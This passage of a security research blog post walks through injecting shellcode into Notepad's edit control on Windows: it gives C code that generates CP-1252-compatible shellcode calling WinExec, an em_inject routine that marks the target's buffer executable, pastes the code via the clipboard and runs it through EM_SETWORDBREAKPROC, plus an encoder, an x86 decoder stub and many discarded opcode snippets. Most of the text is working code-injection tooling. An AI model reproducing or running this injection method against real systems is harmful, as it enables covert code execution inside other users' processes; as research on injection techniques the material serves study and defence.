  /* 002D */ "\x00\x4d\x00"         /* add  byte [rbp], cl   */
  /* 0030 */ "\x59"                 /* pop  rcx              */
  /* 0031 */ "\x00\x4d\x00"         /* add  byte [rbp], cl   */
  /* 0034 */ "\x5b"                 /* pop  rbx              */
  /* 0035 */ "\x00\x4d\x00"         /* add  byte [rbp], cl   */
  /* 0038 */ "\x5e"                 /* pop  rsi              */
  /* 0039 */ "\x00\x4d\x00"         /* add  byte [rbp], cl   */
  /* 003C */ "\x5f"                 /* pop  rdi              */
  /* 003D */ "\x00\x4d\x00"         /* add  byte [rbp], cl   */
  /* 0040 */ "\x59"                 /* pop  rcx              */
  /* 0041 */ "\x00\x4d\x00"         /* add  byte [rbp], cl   */
  /* 0044 */ "\x6a\x00"             /* push 0                */
  /* 0046 */ "\x58"                 /* pop  rax              */
  /* 0047 */ "\x00\x4d\x00"         /* add  byte [rbp], cl   */
  /* 004A */ "\x5c"                 /* pop  rsp              */
  /* 004B */ "\x00\x4d\x00"         /* add  byte [rbp], cl   */
  /* 004E */ "\x5d"                 /* pop  rbp              */
};


static
u8* cp1252_generate_winexec(int pid, int *cslen) {
    int     i, ofs, outlen;
    u8      *cs, *out;
    HMODULE m;
    w64_t   addr;
    
    // it won't exceed 512 bytes
    cs = out = (u8*)VirtualAlloc(
      NULL, 4096, 
      MEM_COMMIT | MEM_RESERVE, 
      PAGE_EXECUTE_READWRITE);
    
    // initialize parameters for WinExec()
    memcpy(out, CALC3, CALC3_SIZE);
    out += CALC3_SIZE;

    // initialize RDI for writing
    memcpy(out, STORE_ADDR, STORE_ADDR_SIZE);
    out += STORE_ADDR_SIZE;

    // ***********************************
    // store kernel32!WinExec on stack
    m = GetModuleHandle("kernel32");
    addr.q = ((PBYTE)GetProcAddress(m, "WinExec") - (PBYTE)m);
    m = GetProcessModuleHandle(pid, "kernel32.dll");
    addr.q += (ULONG_PTR)m;
    
    for(i=0; i<MAX_ADDR; i++) {      
      // load a byte into AH
      memcpy(out, LOAD_BYTE, LOAD_BYTE_SIZE);
      out[2] = addr.b[i];
    
      // if byte not allowed for CP1252, add 32
      if(!is_cp1252_allowed(out[2])) {
        out[2] += 32;
        // subtract 32 from byte at runtime
        memcpy(&out[LOAD_BYTE_SIZE], SUB_BYTE, SUB_BYTE_SIZE);
        out += SUB_BYTE_SIZE;
      }
      out += LOAD_BYTE_SIZE;
      // store AH in [RDI], increment RDI
      memcpy(out, STORE_BYTE, STORE_BYTE_SIZE);
      out += STORE_BYTE_SIZE;
    }
    
    // calculate length of constructed code
    ofs = (int)(out - (u8*)cs) + 2;
    
    // first offset
    cs[RET_OFS] = (uint8_t)ofs;
    
    memcpy(out, RET, RET_SIZE);
    out += RET_SIZE;
    
    memcpy(out, CALC4, CALC4_SIZE);
    
    // second offset
    ofs = CALC4_SIZE;
    ((u8*)out)[RET_OFS2] = (uint8_t)ofs;
    out += CALC4_SIZE;
    
    outlen = ((int)(out - (u8*)cs) + 1) & -2;

    // convert to ascii
    for(i=0; i<=outlen; i+=2) {
      cs[i/2] = cs[i];
    }

    *cslen = outlen / 2;
    // return pointer to code
    return cs;
}
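
The per-byte decision made inside the loop above can be isolated and checked on its own. The sketch below mirrors that logic with hypothetical names (clip_byte_ok, plan_addr_byte). The lengths 5, 8 and 9 are the LOAD_BYTE, SUB_BYTE and STORE_BYTE sizes from the listing.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

enum { LOAD_LEN = 5, SUB_LEN = 8, STORE_LEN = 9 };

/* Same rule as is_cp1252_allowed(): zero and the bad ranges are rejected. */
static int clip_byte_ok(uint8_t b) {
    if (b == 0) return 0;
    if (b >= 0x80 && b <= 0x8C) return 0;
    if (b >= 0x91 && b <= 0x9C) return 0;
    return b != 0x8E && b != 0x9E && b != 0x9F;
}

/* For one address byte, work out the value placed in the MOV immediate,
   whether a runtime "subtract 32" is needed, and how many bytes of widened
   code are emitted for it. */
static size_t plan_addr_byte(uint8_t b, uint8_t *load, int *needs_sub) {
    assert(load != NULL && needs_sub != NULL);

    *needs_sub = !clip_byte_ok(b);
    *load      = *needs_sub ? (uint8_t)(b + 32) : b;

    return LOAD_LEN + (*needs_sub ? SUB_LEN : 0) + STORE_LEN;
}
```

Adding 32 works because every rejected byte, shifted by 0x20, lands on a value that is allowed, so one fix-up step is always enough.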

5. Injecting and Executing Shellcode

The following steps are used.

  1. Execute notepad.exe and obtain a window handle for the edit control.
  2. Get the edit control handle using the EM_GETHANDLE message.
  3. Generate text equal to or greater than the size of the shellcode and copy it to the clipboard.
  4. Assign a NULL pointer to lastbuf.
  5. Read the address of the input buffer from the EM handle and assign it to embuf.
  6. If lastbuf and embuf are equal, goto step 9. Otherwise, save embuf in lastbuf.
  7. Clear the memory buffer using EM_SETSEL and WM_CLEAR.
  8. Send the WM_PASTE message to the edit control window handle. Wait 1 second, then goto step 5.
  9. Set embuf to PAGE_EXECUTE_READWRITE.
  10. Generate CP-1252 compatible shellcode, copy it to the clipboard, then clear the edit control and paste it with WM_PASTE.
  11. Set the edit control word break function to embuf using EM_SETWORDBREAKPROC.
  12. Trigger execution of the shellcode using WM_LBUTTONDBLCLK.
BOOL em_inject(void) {
    HWND   npw, ecw;
    w64_t  emh, lastbuf, embuf;
    SIZE_T rd;
    HANDLE hp;
    DWORD  cslen, pid, old;
    BOOL   r;
    PBYTE  cs;
    
    char   buf[1024];
    
    // get window handle for notepad class
    npw = FindWindow("Notepad", NULL);
    
    // get window handle for edit control
    ecw = FindWindowEx(npw, NULL, "Edit", NULL);
    
    // get the EM handle for the edit control
    emh.p = (PVOID)SendMessage(ecw, EM_GETHANDLE, 0, 0);
    
    // get the process id for the window
    GetWindowThreadProcessId(ecw, &pid);
    
    // open the process for reading and changing memory permissions
    hp = OpenProcess(PROCESS_VM_READ | PROCESS_VM_OPERATION, FALSE, pid);

    // copy some test data to the clipboard
    memset(buf, 0x4d, sizeof(buf));
    CopyToClipboard(CF_TEXT, buf, sizeof(buf));    
    
    // loop until target buffer address is stable
    lastbuf.p = NULL;
    r = FALSE;

    for(;;) {
      // read the address of input buffer     
      ReadProcessMemory(hp, emh.p, 
        &embuf.p, sizeof(ULONG_PTR), &rd);

      // Address hasn't changed? exit loop
      if(embuf.p == lastbuf.p) {
        r = TRUE;
        break;
      }
      // save this address
      lastbuf.p = embuf.p;
    
      // clear the contents of edit control
      SendMessage(ecw, EM_SETSEL, 0, -1);
      SendMessage(ecw, WM_CLEAR, 0, 0);
      
      // send the WM_PASTE message to the edit control
      // allow notepad some time to read the data from clipboard
      SendMessage(ecw, WM_PASTE, 0, 0);
      Sleep(WAIT_TIME);
    }
    
    if(r) {
      // set buffer to RWX
      VirtualProtectEx(hp, embuf.p, 4096, PAGE_EXECUTE_READWRITE, &old);
        
      // generate shellcode and copy to clipboard
      cs = cp1252_generate_winexec(pid, &cslen);
      CopyToClipboard(CF_TEXT, cs, cslen);
        
      // clear buffer and inject shellcode
      SendMessage(ecw, EM_SETSEL, 0, -1);
      SendMessage(ecw, WM_CLEAR, 0, 0);
      SendMessage(ecw, WM_PASTE, 0, 0);
      Sleep(WAIT_TIME);
      
      // set the word break procedure to address of shellcode and execute
      SendMessage(ecw, EM_SETWORDBREAKPROC, 0, (LPARAM)embuf.p);
      SendMessage(ecw, WM_LBUTTONDBLCLK, MK_LBUTTON, (LPARAM)0x000a000a);
      SendMessage(ecw, EM_SETWORDBREAKPROC, 0, (LPARAM)NULL);
      
      // set buffer to RW
      VirtualProtectEx(hp, embuf.p, 4096, PAGE_READWRITE, &old);
    }
    CloseHandle(hp);
    return r;
}
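
The WM_LBUTTONDBLCLK call above passes 0x000a000a as lParam. For mouse messages, the low-order word carries the x coordinate and the high-order word the y coordinate relative to the client area, so this value describes a double-click at (10, 10). A small portable sketch of the packing follows; the function names are hypothetical and do the same job as the MAKELPARAM macro on Windows.

```c
#include <assert.h>
#include <stdint.h>

/* Pack client coordinates the way mouse messages expect them:
   x in the low 16 bits, y in the high 16 bits. */
static uint32_t pack_mouse_lparam(uint16_t x, uint16_t y) {
    return (uint32_t)x | ((uint32_t)y << 16);
}

/* Recover the individual coordinates from a packed value. */
static uint16_t lparam_x(uint32_t lp) { return (uint16_t)(lp & 0xFFFF); }
static uint16_t lparam_y(uint32_t lp) { return (uint16_t)(lp >> 16); }
```

Any point inside the edit control's text area should work; the coordinates only need to land on text so that the control calls its word break procedure.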

6. Demonstration

Notepad doesn’t crash as a result of the shellcode running. The demo terminates it once the thread ends.

7. Encoding Arbitrary Data

Encoding data and code require different solutions. Raw data that doesn’t execute requires “bad characters” removed from it, while code must execute successfully after the conversion, which is not easy to accomplish in practice. The following encoding and decoding algorithms are based on a previous post about removing null characters in shellcode.

7.1 Encoding

  1. Read a byte from the input file or stream and assign to X.
  2. If X plus 1 is allowed, goto step 6.
  3. Save escape code (0x01) to the output file or stream.
  4. XOR X with 8-Bit key.
  5. Save X to the output file or stream, goto step 7.
  6. Save X plus 1 to the output file or stream.
  7. Repeat steps 1-6 until EOF.
// encode raw data to CP-1252 compatible data
static
void cp1252_encode(FILE *in, FILE *out) {
    uint8_t c;
    
    for(;;) {
      // read byte
      c = getc(in);
      // end of file? exit
      if(feof(in)) break;
      // if the result of c + 1 is disallowed
      if(!is_decoder_allowed((uint8_t)(c + 1))) {
        // write escape code
        putc(0x01, out);
        // save byte XOR'd with the 8-Bit key
        putc(c ^ CP1252_KEY, out);
      } else {
        // save byte plus 1
        putc(c + 1, out);
      }
    }
}

7.2 Decoding

  1. Read a byte from the input file or stream and assign to X.
  2. If X is not an escape code, goto step 6.
  3. Read a byte from the input file or stream and assign to X.
  4. XOR X with 8-Bit key.
  5. Save X to the output file or stream, goto step 7.
  6. Save X – 1 to the output file or stream.
  7. Repeat steps 1-6 until EOF.
// decode data processed with cp1252_encode to their original values
static
void cp1252_decode(FILE *in, FILE *out) {
    uint8_t c;
    
    for(;;) {
      // read byte
      c = getc(in);
      // end of file? exit
      if(feof(in)) break;
      // if this is an escape code
      if(c == 0x01) {
        // read next byte
        c = getc(in);
        // XOR the 8-Bit key
        putc(c ^ CP1252_KEY, out);
      } else {
        // save byte minus one
        putc(c - 1, out);
      }
    }
}
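
To check that the two routines are inverses, here is a minimal in-memory sketch of the same scheme working on buffers instead of FILE streams. The predicate allowed is a hypothetical stand-in for is_decoder_allowed: it assumes 0x00, the escape code 0x01 and the range 0x80-0x9F are the bytes to avoid. The key 0x4D matches the CP1252_KEY value used by the assembly decoder in this section.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

#define KEY 0x4D   /* same value as CP1252_KEY */
#define ESC 0x01   /* escape code */

/* Hypothetical stand-in for is_decoder_allowed(). */
static int allowed(uint8_t b) {
    return b != 0x00 && b != ESC && (b < 0x80 || b > 0x9F);
}

/* Encode len bytes; out must hold up to 2 * len bytes.
   Returns the number of bytes written. */
static size_t encode_buf(const uint8_t *in, size_t len, uint8_t *out) {
    size_t n = 0;
    for (size_t i = 0; i < len; i++) {
        uint8_t next = (uint8_t)(in[i] + 1);
        if (allowed(next)) {
            out[n++] = next;                     /* byte plus 1 */
        } else {
            out[n++] = ESC;                      /* escape code */
            out[n++] = (uint8_t)(in[i] ^ KEY);   /* byte XOR key */
        }
    }
    return n;
}

/* Decode len bytes produced by encode_buf; returns bytes written. */
static size_t decode_buf(const uint8_t *in, size_t len, uint8_t *out) {
    size_t n = 0;
    for (size_t i = 0; i < len; i++) {
        if (in[i] == ESC) {
            assert(i + 1 < len);                 /* escape needs a payload */
            out[n++] = (uint8_t)(in[++i] ^ KEY);
        } else {
            out[n++] = (uint8_t)(in[i] - 1);
        }
    }
    return n;
}
```

With this predicate, every escaped byte XORed with 0x4D lands outside 0x80-0x9F, so the encoded stream contains no bytes from that range and no nulls.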

The assembly is compatible with both the 32-bit and 64-bit modes of the x86 architecture.

; cp1252 decoder in 40 bytes of x86/amd64 assembly
; presumes to be executing in RWX memory
; needs stack allocation if executing from RX memory
;
; odzhan

    bits 32
    
    %define CP1252_KEY 0x4D
    
    jmp    init_decode       ; read the program counter
    
    ; esi = source
    ; edi = destination 
    ; ecx = length
decode_bytes:
    lodsb                    ; read a byte
    dec    al                ; c - 1
    jnz    save_byte
    lodsb                    ; skip null byte
    lodsb                    ; read next byte
    xor    al, CP1252_KEY    ; c ^= CP1252_KEY
save_byte:
    stosb                    ; save in buffer
    lodsb                    ; skip null byte
    loop   decode_bytes
    ret
load_data:
    pop    esi               ; esi = start of data
    ; ********************** ; decode the 32-bit length
read_len:
    push   0                 ; len = 0
    push   esp               ; 
    pop    edi               ; edi = &len
    push   4                 ; 32-bits
    pop    ecx
    call   decode_bytes
    pop    ecx               ; ecx = len
    
    ; ********************** ; decode remainder of data
    push   esi               ; 
    pop    edi               ; edi = encoded data
    push   esi               ; save address for RET
    jmp    decode_bytes
init_decode:
    call   load_data
    ; CP1252 encoded data goes here..
    

The decoder could be stored at the beginning of the buffer and the callback could be stored higher up in memory.
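
For readers who prefer C, the following is a rough model of what the assembly decoder does. It assumes the encoded data has already been widened by the paste, so every encoded byte is followed by a null byte, and that the blob starts with an encoded 32-bit little-endian length as the comments in the listing suggest. The function names decode_wide and decode_blob are hypothetical.

```c
#include <assert.h>
#include <stdint.h>

#define CP1252_KEY 0x4D

/* Mirrors decode_bytes: produces count decoded bytes from src, where each
   encoded byte is followed by a null. Returns the advanced source pointer. */
static uint8_t *decode_wide(uint8_t *src, uint8_t *dst, uint32_t count) {
    assert(src != 0 && dst != 0);
    while (count--) {
        uint8_t al = (uint8_t)(*src++ - 1);       /* lodsb / dec al      */
        if (al == 0) {                            /* escape code 0x01    */
            src++;                                /* lodsb: skip null    */
            al = (uint8_t)(*src++ ^ CP1252_KEY);  /* lodsb / xor al, key */
        }
        *dst++ = al;                              /* stosb               */
        src++;                                    /* lodsb: skip null    */
    }
    return src;
}

/* Mirrors load_data: decode the length, then decode the payload in place.
   *payload receives the start of the decoded data. */
static uint32_t decode_blob(uint8_t *blob, uint8_t **payload) {
    uint8_t  lb[4];
    uint8_t *p = decode_wide(blob, lb, 4);
    uint32_t len = (uint32_t)lb[0] | ((uint32_t)lb[1] << 8) |
                   ((uint32_t)lb[2] << 16) | ((uint32_t)lb[3] << 24);
    decode_wide(p, p, len);   /* destination never overtakes the source */
    *payload = p;
    return len;
}
```

Decoding in place is safe because each output byte consumes at least two input bytes, which is why the assembly can point EDI and ESI at the same address.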

8. Acknowledgements

I’d like to thank Adam for feedback and advice on this post, specifically about CF_UNICODETEXT.

9. Further Research

List of papers and presentations relevant to this post. If you know of any good papers on writing Unicode shellcodes that aren’t listed here, feel free to email me with the details.

10. Code Scrapheap

What follows are just some bits of code that were considered, but not used in the end. Explanations are provided for why they were discarded.

The first one tries to set EAX to 0: set AL and AH to 0, then extend AX to EAX using CWDE. Unfortunately, the CWDE opcode (0x98) can’t be used because CP-1252 maps it to U+02DC, a double-byte encoding.

"\xb0\x00"     /* mov  al, 0             */
"\x00\x4d\x00" /* add  byte [ebp], cl    */
"\xb4\x00"     /* mov  ah, 0             */
"\x00\x4d\x00" /* add  byte [ebp], cl    */
"\x98"         /* cwde                   */

Another idea for setting EAX to 0. Clear the Carry Flag using CLC, then set EAX to 0xFF00FF00. Subtract 0xFF00FF00 + CF from EAX, which sets EAX to 0. Can you spot the problem? 🙂 Well, the ADD affects the Carry Flag, so that’s why it doesn’t work as intended. Of course, it might work, depending on what RBP points to and the value of CL.

"\xf8"                 /* clc                       */
"\x00\x4d\x00"         /* add   byte [rbp], cl      */
"\xb8\x00\xff\x00\xff" /* mov   eax, 0xff00ff00     */
"\x00\x4d\x00"         /* add   byte [rbp], cl      */
"\x1d\x00\xff\x00\xff" /* sbb   eax, 0xff00ff00     */
"\x00\x4d\x00"         /* add   byte [rbp], cl      */

An idea to set EAX to -1. First, set the Carry Flag using STC, set EAX to 0xFF00FF00. Subtract 0xFF00FF00 + CF from EAX which sets EAX to 0xFFFFFFFF. Same problem as before.

"\xf9"                 /* stc                       */
"\x00\x4d\x00"         /* add   byte [rbp], cl      */
"\xb8\x00\xff\x00\xff" /* mov   eax, 0xff00ff00     */
"\x00\x4d\x00"         /* add   byte [rbp], cl      */
"\x1d\x00\xff\x00\xff" /* sbb   eax, 0xff00ff00     */
"\x00\x4d\x00"         /* add   byte [rbp], cl      */

This was an idea for setting EAX to 1. First, set EAX to zero. Set the Carry Flag (CF), then add CF to AL using Add with Carry (ADC). Same problem as before.

"\x6a\x00"             /* push  0                     */
"\x58"                 /* pop   rax                   */
"\x00\x4d\x00"         /* add   byte [rbp], cl        */
"\xf9"                 /* stc                         */
"\x00\x4d\x00"         /* add   byte [rbp], cl        */
"\x14\x00"             /* adc   al, 0                 */

Another version to set EAX to -1. Store zero on the stack, load its address into RAX and add 1. Rotate left by 31 bits to get 0x80000000. Load into EAX and use CDQ to set EDX to -1, then swap EAX and EDX. The problem is that 0x99 converts to a double-byte encoding.

"\x6a\x00"     /* push 0                 */
"\x54"         /* push rsp               */
"\x00\x4d\x00" /* add  byte [rbp], cl    */
"\x58"         /* pop  rax               */
"\x00\x4d\x00" /* add  byte [rbp], cl    */
"\xff\x00"     /* inc  dword [rax]       */
"\x00\x4d\x00" /* add  byte [rbp], cl    */
"\xc1\x00\x1f" /* rol  dword [rax], 0x1f */
"\x00\x4d\x00" /* add  byte [rbp], cl    */
"\x58"         /* pop  rax               */
"\x00\x4d\x00" /* add  byte [rbp], cl    */
"\x99"         /* cdq                    */
"\x00\x4d\x00" /* add  byte [rbp], cl    */
"\x92"         /* xchg eax, edx          */

I examined various ways to simulate instructions and conceded it could only work using self-modifying code: using boolean logic with bitwise instructions (AND/XOR/OR/NOT) and some arithmetic (NEG/ADD/SUB) to select the address where code execution should continue. The RET instruction is the only opcode that can be used to transfer execution. There are no JMP, Jcc or CALL instructions that can be used directly.

If we have to modify code to simulate boolean logic, it makes more sense to just write instructions into memory and execute it there.

"\x39\xd8"             /* cmp   eax, ebx           */

There’s no simple combination of registers used with CMP or SUB that’s compatible with CP-1252. You can compare EAX with immediate values but nothing else. The following code using CMPSD attempts to demonstrate evaluating if EAX < EBX, generating a result of 0 (FALSE) or -1 (TRUE). It would have worked, except the ADD instructions before SBB modify the Carry Flag and generate the wrong result.

"\x50"                 /* push  rax                    */
"\x00\x4d\x00"         /* add   byte [rbp], cl         */
"\x54"                 /* push  rsp                    */
"\x00\x4d\x00"         /* add   byte [rbp], cl         */
"\x5e"                 /* pop   rsi                    */
"\x00\x4d\x00"         /* add   byte [rbp], cl         */
"\x53"                 /* push  rbx                    */
"\x00\x4d\x00"         /* add   byte [rbp], cl         */
"\x54"                 /* push  rsp                    */
"\x00\x4d\x00"         /* add   byte [rbp], cl         */
"\x5f"                 /* pop   rdi                    */
"\x00\x4d\x00"         /* add   byte [rbp], cl         */
"\xa7"                 /* cmpsd                        */
"\x00\x4d\x00"         /* add   byte [rbp], cl         */
"\x6a\x00"             /* push  0                      */
"\x58"                 /* pop   rax                    */
"\x00\x4d\x00"         /* add   byte [rbp], cl         */
"\x1c\x00"             /* sbb   al, 0                  */
"\x50"                 /* push  rax                    */
"\x00\x4d\x00"         /* add   byte [rbp], cl         */
"\x54"                 /* push  rsp                    */
"\x00\x4d\x00"         /* add   byte [rbp], cl         */
"\x58"                 /* pop   rax                    */
"\x00\x4d\x00"         /* add   byte [rbp], cl         */
"\xc1\x00\x18"         /* rol   dword ptr [rax], 0x18  */
"\x00\x4d\x00"         /* add   byte [rbp], cl         */
"\x58"                 /* pop   rax                    */
"\x00\x4d\x00"         /* add   byte [rbp], cl         */
"\x6a\x00"             /* push  0                      */
"\x54"                 /* push  rsp                    */
"\x00\x4d\x00"         /* add   byte [rbp], cl         */
"\x5f"                 /* pop   rdi                    */
"\x00\x4d\x00"         /* add   byte [rbp], cl         */
"\xaa"                 /* stosb                        */
"\x00\x4d\x00"         /* add   byte [rbp], cl         */
"\xaa"                 /* stosb                        */
"\x00\x4d\x00"         /* add   byte [rbp], cl         */
"\xaa"                 /* stosb                        */
"\x00\x4d\x00"         /* add   byte [rbp], cl         */
"\xaa"                 /* stosb                        */

Load 0xFF000700 into EAX. The Carry Flag (CF) is set using SAHF. Then subtract 0xFF000700 + CF using SBB, which sets EAX to -1 or 0xFFFFFFFF.

"\xb8\x00\x07\x00\xff" /* mov   eax, 0xff000700    */
"\x00\x4d\x00"         /* add   byte [rbp], cl     */
"\x9e"                 /* sahf                     */
"\x00\x4d\x00"         /* add   byte [rbp], cl     */
"\x1d\x00\x07\x00\xff" /* sbb   eax, 0xff000700    */
"\x00\x4d\x00"         /* add   byte [rbp], cl     */

Two problems: SAHF is a byte we can’t use (0x9E) and even if we could, the ADD after the SAHF instruction modifies the flags register, resulting in EAX being set to 0 or -1. The result depends on the byte stored at the address RBP contains and the value of CL.
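
The flag problem that keeps recurring in these snippets can be modelled in a few lines of C. This is only a sketch of the arithmetic, not an emulator: add8 is a hypothetical helper that models `add byte [rbp], cl` and returns the resulting Carry Flag, and the function walks through the SAHF sequence above with the byte at [rbp] and CL supplied as parameters.

```c
#include <assert.h>
#include <stdint.h>

/* Models "add byte [rbp], cl": updates the byte and returns the new CF. */
static uint8_t add8(uint8_t *mem, uint8_t cl) {
    uint16_t sum = (uint16_t)(*mem + cl);
    *mem = (uint8_t)sum;
    return (uint8_t)(sum >> 8);
}

/* Models the SAHF sequence: the padding ADD after SAHF overwrites CF,
   so the SBB no longer sees the flag that SAHF loaded from AH. */
static uint32_t minus_one_attempt(uint8_t mem, uint8_t cl) {
    uint8_t  cf;
    uint32_t eax = 0xFF000700u;       /* mov eax, 0xff000700             */
    (void)add8(&mem, cl);             /* add byte [rbp], cl              */
    cf = (uint8_t)((eax >> 8) & 1);   /* sahf: CF = bit 0 of AH (0x07)   */
    assert(cf == 1);                  /* this is what we wanted to keep  */
    cf = add8(&mem, cl);              /* add byte [rbp], cl clobbers CF  */
    return eax - 0xFF000700u - cf;    /* sbb eax, 0xff000700             */
}
```

With the byte at [rbp] equal to 0xFE and CL equal to 1, the second ADD wraps and sets CF, giving -1; with the byte equal to 0, no carry occurs and the result is 0.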

Adding -1 will subtract 1 from the variable whose address RAX contains.

"\x6a\x00"             /* push  0                    */
"\x54"                 /* push  rsp                  */
"\x00\x4d\x00"         /* add   byte [rbp], cl       */
"\x58"                 /* pop   rax                  */
"\x00\x4d\x00"         /* add   byte [rbp], cl       */
"\x83\x00\xff"         /* add   dword [rax], -1      */
"\x58"                 /* pop   rax                  */
"\x00\x4d\x00"         /* add   byte [rbp], cl       */

Works fine, but because 0x83 converts to a double-byte encoding, we can’t use it.

Set the Carry Flag (CF) with STC. Subtract 0 + CF from AL using SBB AL, 0, which sets AL to 0xFF. Create a variable set to 0 on the stack. Load the address of that variable into RDI. Store AL in the variable four times before loading it into RAX. This doesn’t work because the addition after STC modifies the Carry Flag.

"\xf9"                 /* stc                       */
"\x00\x4d\x00"         /* add   byte [rbp], cl      */
"\x1c\x00"             /* sbb   al, 0               */
"\x6a\x00"             /* push  0                   */
"\x54"                 /* push  rsp                 */
"\x00\x4d\x00"         /* add   byte [rbp], cl      */
"\x5f"                 /* pop   rdi                 */
"\x00\x4d\x00"         /* add   byte [rbp], cl      */
"\xaa"                 /* stosb                     */
"\x00\x4d\x00"         /* add   byte [rbp], cl      */
"\xaa"                 /* stosb                     */
"\x00\x4d\x00"         /* add   byte [rbp], cl      */
"\xaa"                 /* stosb                     */
"\x00\x4d\x00"         /* add   byte [rbp], cl      */
"\xaa"                 /* stosb                     */
"\x00\x4d\x00"         /* add   byte [rbp], cl      */
"\x58"                 /* pop   rax                 */
"\x00\x4d\x00"         /* add   byte [rbp], cl      */

The next snippet simply copies the value of RCX to RAX. It’s overcomplicated, although the POP QWORD instruction might be useful in some scenarios. I just didn’t find it useful.

"\x6a\x00"             /* push  0              */
"\x54"                 /* push  rsp            */
"\x00\x4d\x00"         /* add   byte [rbp], cl */
"\x58"                 /* pop   rax            */
"\x00\x4d\x00"         /* add   byte [rbp], cl */
"\x51"                 /* push  rcx            */
"\x00\x4d\x00"         /* add   byte [rbp], cl */
"\x8f\x00"             /* pop   qword [rax]    */
"\x00\x4d\x00"         /* add   byte [rbp], cl */
"\x58"                 /* pop   rax            */

Adding registers is a problem, specifically when a carry occurs. Any operation on a 32-bit register automatically clears the upper 32-bits of a 64-bit register, so to perform addition and subtraction on addresses, ADD and SUB of 32-bit registers isn’t useful.

    push   0
    pop    rcx
    xnop
    push   rbp              ; save rbp      
    xnop
    ; 1. ====================================
    push   0                ; store 0 as X
    push   rsp              ; store &X
    xnop
    pop    rbp              ; load &X
    xnop
    ; 2. ====================================
    mov    eax, 0xFF001200  ; load 0xFF001200
    add    [rbp], ah        ; add 0x12
    adc    al, 0            ; AL = CF
    push   rbp              ; store &X
    xnop
    push   rsp              ; store &&X
    xnop
    pop    rax              ; load &&X
    xnop
    inc    dword[rax]       ; &X++
    pop    rbp
    xnop
    add    [rbp], al        ; add CF
    ; 3. ====================================

Finally, one that may or may not be useful. Imagine you have a shellcode and you want to reconstruct it in memory before executing. If the address of table 1 is in RAX, table 2 in RSI and R8 is zero, this next instruction might be useful. Every even byte of the shellcode would be stored in one table with every odd byte stored in another. Then at runtime, we combine the two. The only problem is getting R8 to zero, because anything that uses it requires a REX prefix. I’m leaving it here in case R8 is already zero.

    ; read byte from table 2
    lodsb
    add [rbp], cl
    add byte[rax+r8+1], al   ; copy to table 1
    add [rbp], cl
    
    lodsb
    add [rbp], cl
    add byte[rax+r8+3], al
    add [rbp], cl
    
    lodsb
    add [rbp], cl
    add byte[rax+r8+5], al
    add [rbp], cl
    
    ; and so on..
    
    ; execute
    push rax
    ret

The same instruction can be used to add an 8-bit value to a 32-bit word.

    ; step 1
    push   rax              ; save pointer
    add    byte[rbp], cl
    add    byte[rax+r8], bl ; A[0] += B[0]
    mov    al, 0
    adc    al, 0            ; set carry
    add    byte[rbp], cl
    push   rax              ; save carry
    add    byte[rbp], cl
    pop    rcx              ; load carry into CL
    add    byte[rbp], cl
    pop    rax              ; restore pointer
    add    byte[rbp], cl
    
    ; step 2
    push   rax              ; save pointer
    add    byte[rbp], cl
    rol    dword[rax], 24   
    add    byte[rbp], cl
    add    byte[rax+r8], cl ; A[1] += CF
    mov    al, 0
    adc    al, 0            ; set carry
    add    byte[rbp], cl
    push   rax              ; save carry
    add    byte[rbp], cl
    pop    rcx              ; load carry into CL
    add    byte[rbp], cl
    pop    rax              ; restore pointer
    add    byte[rbp], cl
    
    ; step 3
    push   rax              ; save pointer
    add    byte[rbp], cl
    rol    dword[rax], 24    
    add    byte[rbp], cl
    add    byte[rax+r8], cl ; A[2] += CF
    mov    al, 0
    adc    al, 0            ; set carry
    add    byte[rbp], cl
    push   rax              ; save carry
    add    byte[rbp], cl
    pop    rcx              ; load carry into CL
    add    byte[rbp], cl
    pop    rax              ; restore pointer
    add    byte[rbp], cl

    ; step 4
    push   rax              ; save pointer
    add    byte[rbp], cl
    rol    dword[rax], 24    
    add    byte[rbp], cl
    add    byte[rax+r8], cl ; A[3] += CF
    mov    al, 0
    adc    al, 0            ; set carry
    add    byte[rbp], cl
    push   rax              ; save carry
    add    byte[rbp], cl
    pop    rcx              ; load carry into CL
    add    byte[rbp], cl
    pop    rax              ; restore pointer
    add    byte[rbp], cl
    
    ; step 5
    rol    dword[rax], 24
    add    byte[rbp], cl
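
Stripped of the padding instructions, the five steps above amount to a byte-wise addition with carry propagation, rotating the word by 24 bits after each step so the next byte moves into the low position. A minimal C model of that arithmetic, assuming the 8-bit value starts in BL and ignoring the side effects of the padding ADDs, might look like this; the function names are hypothetical.

```c
#include <assert.h>
#include <stdint.h>

/* Rotate a 32-bit value left by n bits (0 < n < 32). */
static uint32_t rol32(uint32_t x, unsigned n) {
    assert(n > 0 && n < 32);
    return (x << n) | (x >> (32 - n));
}

/* Add an 8-bit value to a 32-bit word one byte at a time. */
static uint32_t add8_to_32(uint32_t a, uint8_t b) {
    uint8_t carry = b;                    /* step 1 adds BL, later steps add CF */
    for (int step = 0; step < 4; step++) {
        uint16_t sum = (uint16_t)((a & 0xFF) + carry);
        a = (a & 0xFFFFFF00u) | (sum & 0xFF);   /* add byte [rax+r8], ..  */
        carry = (uint8_t)(sum >> 8);            /* mov al, 0 / adc al, 0  */
        a = rol32(a, 24);                       /* rol dword [rax], 24    */
    }
    return a;
}
```

Four rotations by 24 bits total 96 bits, a multiple of 32, so the word ends up back in its original byte order with the sum applied.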

As you can see, it’s a mess to try to simulate instructions instead of just writing the code to memory and executing it that way…or use CF_UNICODETEXT for copying to the clipboard. 😉
